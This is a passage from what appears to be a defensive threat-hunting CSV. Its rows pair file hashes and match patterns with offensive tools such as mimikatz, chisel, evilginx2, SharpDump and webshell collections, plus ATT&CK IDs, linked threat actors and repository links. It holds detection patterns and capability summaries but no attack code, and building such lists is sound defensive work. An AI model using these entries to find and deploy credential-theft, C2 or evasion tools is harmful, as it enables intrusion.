"*a79765b3ea99f275733ff0d9860658a403469ff3e7cb25e52a58f9d2c79e89f4*",".{0,1000}a79765b3ea99f275733ff0d9860658a403469ff3e7cb25e52a58f9d2c79e89f4.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32692" 
"*a79e0e65a3c5cabbc86bbdf3ff63f512885e1c35b24f4b648ffa3e3d3cb30a64*",".{0,1000}a79e0e65a3c5cabbc86bbdf3ff63f512885e1c35b24f4b648ffa3e3d3cb30a64.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32695" "*a7a1bc83f94696c2ef637e12c28afd5f5cbb8f7d0cf22cb41921d77b6c39a721*",".{0,1000}a7a1bc83f94696c2ef637e12c28afd5f5cbb8f7d0cf22cb41921d77b6c39a721.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","32696" "*a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e*",".{0,1000}a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32698" "*a7aa95075ecb1e4b2201ac1962eac88639e816ebf94c0d08b2bd5da274a981db*",".{0,1000}a7aa95075ecb1e4b2201ac1962eac88639e816ebf94c0d08b2bd5da274a981db.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32700" "*a7ab668cab3a63df4a03cc53c46eed13fbb13bf1*",".{0,1000}a7ab668cab3a63df4a03cc53c46eed13fbb13bf1.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","32701" "*a7accf6149a294089b3a2220d4ba48e567a31f4af6d8b4b8654ba90bae93895a*",".{0,1000}a7accf6149a294089b3a2220d4ba48e567a31f4af6d8b4b8654ba90bae93895a.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","32702" "*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*",".{0,1000}A7AD39B5\-9BA1\-48A9\-B928\-CA25FDD8F31F.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","#GUIDproject","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","32703" "*a7ae058a146daaf19862116d437757417d05ea628e902bb3e7bcd6611f637086*",".{0,1000}a7ae058a146daaf19862116d437757417d05ea628e902bb3e7bcd6611f637086.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32704" "*a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092*",".{0,1000}a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32705" "*a7c0d88a6a39881381ba63b7061a03dcd7ebd2dc83cc7d6af914140c559f3e27*",".{0,1000}a7c0d88a6a39881381ba63b7061a03dcd7ebd2dc83cc7d6af914140c559f3e27.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32707" "*a7c1eba0aa510794924988b65a5965df2452a5960721bcdaf464d07bd693cbfb*",".{0,1000}a7c1eba0aa510794924988b65a5965df2452a5960721bcdaf464d07bd693cbfb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32708" "*a7c21a6267ae3fe1b9293c3c2d0080de4a994b8ddc7aca048d906a109a17dfea*",".{0,1000}a7c21a6267ae3fe1b9293c3c2d0080de4a994b8ddc7aca048d906a109a17dfea.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32709" "*a7cc4efa0b13e199acd6d09b696b7d2ff0cff7aefd420ef9e87a216a396b1e9d*",".{0,1000}a7cc4efa0b13e199acd6d09b696b7d2ff0cff7aefd420ef9e87a216a396b1e9d.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","32713" "*a7d587bc5790f34766ae32da9825e585fea77ba0b3f9ab6a3b690959ab6f2386*",".{0,1000}a7d587bc5790f34766ae32da9825e585fea77ba0b3f9ab6a3b690959ab6f2386.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32714" "*a7de9b97cf6299048be115fdb123c1205b51a850b40c0bb79fb2b5ebad319d6b*",".{0,1000}a7de9b97cf6299048be115fdb123c1205b51a850b40c0bb79fb2b5ebad319d6b.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon 
exploitation","10","10","N/A","N/A","N/A","N/A","32716" "*a7e469379e562140126522b28d4c00c3ad88fb323ec6d58f3794a76b65e81c67*",".{0,1000}a7e469379e562140126522b28d4c00c3ad88fb323ec6d58f3794a76b65e81c67.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32718" "*a7e8aade00d2cd5aeb6ec40d5b64f6cac88f120efb4efb719567e758af5892c2*",".{0,1000}a7e8aade00d2cd5aeb6ec40d5b64f6cac88f120efb4efb719567e758af5892c2.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","32720" "*a7e9bf156061f6312c826da68a6a0fa9ef025cde57808bec004065ff2fc108db*",".{0,1000}a7e9bf156061f6312c826da68a6a0fa9ef025cde57808bec004065ff2fc108db.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","32721" "*a7f243d5fa0843494e5d83810d2a4be9469fe02b2d8ced52e61a9355d9e6d697*",".{0,1000}a7f243d5fa0843494e5d83810d2a4be9469fe02b2d8ced52e61a9355d9e6d697.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32723" "*a7f5996d248ea178587e34a990457b43a69ada5c4ad1e5586eca9fbcd36668df*",".{0,1000}a7f5996d248ea178587e34a990457b43a69ada5c4ad1e5586eca9fbcd36668df.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32724" "*a7f816de8f8e9534649b723d4d61431736966af0d5ccae7ddde2be54755d8ea4*",".{0,1000}a7f816de8f8e9534649b723d4d61431736966af0d5ccae7ddde2be54755d8ea4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32725" "*a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79*",".{0,1000}a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32726" 
"*a7fcb2adaf096a7aeab2cba92fb1c92091302b2dd18219ee4ec1aedd67383efc*",".{0,1000}a7fcb2adaf096a7aeab2cba92fb1c92091302b2dd18219ee4ec1aedd67383efc.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32727" "*a808917e807c51f703c084d74daf008a759a97f7b1719c40e2453a1b71a39a01*",".{0,1000}a808917e807c51f703c084d74daf008a759a97f7b1719c40e2453a1b71a39a01.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","32729" "*a8107d674c8391e70cf7687976f9973157bcd2458cfb597a22e051c8f62f6f16*",".{0,1000}a8107d674c8391e70cf7687976f9973157bcd2458cfb597a22e051c8f62f6f16.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32730" "*a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903*",".{0,1000}a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - 
APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32732" "*a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903*",".{0,1000}a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - 
Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32733" "*a829137b318890cb77f6a1ce28ce4dbaa4a39e19ef91b75f4f50dfc2b1a992bf*",".{0,1000}a829137b318890cb77f6a1ce28ce4dbaa4a39e19ef91b75f4f50dfc2b1a992bf.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","32737" "*a82b9a0c081af7c9628d7e2b3b70fbf0e1aa89c3cfc2778c177aae45cb394d71*",".{0,1000}a82b9a0c081af7c9628d7e2b3b70fbf0e1aa89c3cfc2778c177aae45cb394d71.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32738" "*a82ec4a7feac8a7bcab876286599e1df136c93ac470ba634fa77be156ee40615*",".{0,1000}a82ec4a7feac8a7bcab876286599e1df136c93ac470ba634fa77be156ee40615.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#filehash","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","32739" "*a8326d0a60d9ea4574fe34d5d65d220b85bfd294ebb8c7228c17c75df71182e9*",".{0,1000}a8326d0a60d9ea4574fe34d5d65d220b85bfd294ebb8c7228c17c75df71182e9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32740" "*a834a0a0c5e0d0ef14de2e986b53b032747f52071815957e42633495fb7bc42f*",".{0,1000}a834a0a0c5e0d0ef14de2e986b53b032747f52071815957e42633495fb7bc42f.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","32741" "*a836426cb1693f3d72b455ae5ff8315993ea5217047bfca288b56554d717f632*",".{0,1000}a836426cb1693f3d72b455ae5ff8315993ea5217047bfca288b56554d717f632.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32742" "*a839c3f26cc75bf3ebc5c8adf91582390c0e625d9c9da30949d968451c6d03dd*",".{0,1000}a839c3f26cc75bf3ebc5c8adf91582390c0e625d9c9da30949d968451c6d03dd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32744" "*a83a41e188cc050f6cb63c7a45855f1095b5db1bbbc26a2cc41696f8be8be2d0*",".{0,1000}a83a41e188cc050f6cb63c7a45855f1095b5db1bbbc26a2cc41696f8be8be2d0.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32745" 
"*a83ba2c435fcf714eda4cc84cde9a72c8214157eba585b2debba0f9274af0e8f*",".{0,1000}a83ba2c435fcf714eda4cc84cde9a72c8214157eba585b2debba0f9274af0e8f.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","32746" "*a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314*",".{0,1000}a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","32747" "*a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314*",".{0,1000}a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","32748" "*a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c*",".{0,1000}a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking 
those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","#filehash","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","32749" "*a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee*",".{0,1000}a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32750" "*a845c8128bc9accb902cdeaa85c93cbf41dc83d74ab4c82ffc13f336bee6e666*",".{0,1000}a845c8128bc9accb902cdeaa85c93cbf41dc83d74ab4c82ffc13f336bee6e666.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32751" "*a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f*",".{0,1000}a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#filehash","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","32752" "*a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c*",".{0,1000}a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32754" "*a865ea23efd65afc7ab6222c34a2c6f15f827d8e8458f3e7c2c1b0a513182cf1*",".{0,1000}a865ea23efd65afc7ab6222c34a2c6f15f827d8e8458f3e7c2c1b0a513182cf1.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","32757" "*a870ee7018be0e35ed196a844c194b0c69ade3ec46b8f7895f6e002a73c114d5*",".{0,1000}a870ee7018be0e35ed196a844c194b0c69ade3ec46b8f7895f6e002a73c114d5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 